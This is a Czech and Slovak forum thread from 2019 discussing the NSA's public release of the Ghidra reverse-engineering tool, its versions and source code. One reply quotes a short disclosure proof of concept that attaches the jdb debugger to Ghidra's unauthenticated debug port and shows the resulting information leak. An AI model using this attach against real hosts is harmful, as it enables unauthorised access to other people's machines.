Author Topic: Ghidra  (Read 1382 times)

DARKER

  • [SCF]
  • Administrator
  • Senior Member
  • *****
  • Posts: 336
Ghidra
« on: March 06, 2019, 08:07:57 AM »

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #1 on: March 07, 2019, 03:27:52 AM »
Už jsem na to koukal a musím říct, že to vypadá dost dobře. A pokud kolem toho vznikne komunita, bude to velká pecka.

Jen jsem přemýšlel, proč to vlastně uvolňovali. Napadly mě asi dvě možnosti:
1. Hledají nové lidi na konkrétní pozice spojené s RCE
2. Mají něco lepšího (pokud to skutečně vyvíjejí od roku 2000, je to skoro 20 let stará aplikace) a rozhodli se tohle věnovat veřejnosti, aby byli zase jednou za ty hodné

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #2 on: March 07, 2019, 03:36:14 AM »
Quote
NSA RE Tool 'GHIDRA' Backed Port - Java Debug Wire Protocol (JDWP) Port Opened(TCP/18001)

Exploit PoC:
jdb -attach x.x.x.x:18001 <= No auth

$ jdb -attach x.x.x.x:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>

Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
>

DARKER

  • [SCF]
  • Administrator
  • Senior Member
  • *****
  • Posts: 336
Re: Ghidra
« Reply #3 on: March 07, 2019, 07:40:50 AM »
Myslim si, ze sa im nema o to kto starat, testovat im to, vyvijat, napady ...
Takto sa im o to postaraju ludia, spravia uzitocne pluginy ...
Cim viac sa to bude pouzivat tym to bude vymakanejsie ...
Som zvedavy ako na to zareaguje Ilfak ... (IDA)

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #4 on: March 07, 2019, 01:20:12 PM »

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #5 on: March 08, 2019, 01:48:49 AM »

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #6 on: March 08, 2019, 10:11:57 AM »
Tak zatím to vypadá, že těch problémů bude víc, než bych čekal  :-X

Aktuálně byla nalezena zranitelnost XXE
https://twitter.com/sghctoma/status/1103392091009413120

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #7 on: March 08, 2019, 11:53:25 PM »

Z!L0G80

  • -=[t4C]=-
  • Senior Member
  • ****
  • Posts: 280
Re: Ghidra
« Reply #8 on: March 09, 2019, 11:55:06 PM »
tez mi prijde ze chteji comunitu aby jim to vylepsila a docela seto rozjizdi viz issues na githubu nebo treba Toshiba MeP processor module for GHIDRA >> https://github.com/xyzz/ghidra-mep
-= SmrT SiGNaTuRaM !!! =-

DARKER

  • [SCF]
  • Administrator
  • Senior Member
  • *****
  • Posts: 336
Re: Ghidra
« Reply #9 on: March 28, 2019, 07:55:27 AM »
Ghidra v9.0.1 (March 2019)

Change Log + Download:
https://ghidra-sre.org/releaseNotes.html

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
Re: Ghidra
« Reply #10 on: April 03, 2019, 08:25:24 PM »

RubberDuck

  • Trial Member
  • **
  • Posts: 74
    • sec-cave.cz
NSA Releases GHIDRA Source Code
« Reply #11 on: April 04, 2019, 04:42:48 PM »
NSA today finally released the complete source code for GHIDRA version 9.0.2 which is now available on its Github repository.

https://github.com/NationalSecurityAgency/ghidra

Kockatá hlava

  • Junior Member
  • ***
  • Posts: 134
  • n00b
    • x86asm.net
Re: Ghidra
« Reply #12 on: June 11, 2019, 07:57:06 AM »
16. 5. vyšla Ghidra 9.0.4 (verze 9.0.3 byla přeskočená). Podle changelogu se daří reagovat na bugy reportovaný komunitou a fixovat je.

Z!L0G80

  • -=[t4C]=-
  • Senior Member
  • ****
  • Posts: 280
Re: Ghidra
« Reply #13 on: June 15, 2019, 02:52:54 PM »
pekne ale furt mi to nejak nejde skompilovat :/
-= SmrT SiGNaTuRaM !!! =-

Kockatá hlava

  • Junior Member
  • ***
  • Posts: 134
  • n00b
    • x86asm.net
Re: Ghidra
« Reply #14 on: June 16, 2019, 10:40:54 AM »
Download release buildu ti nestaci?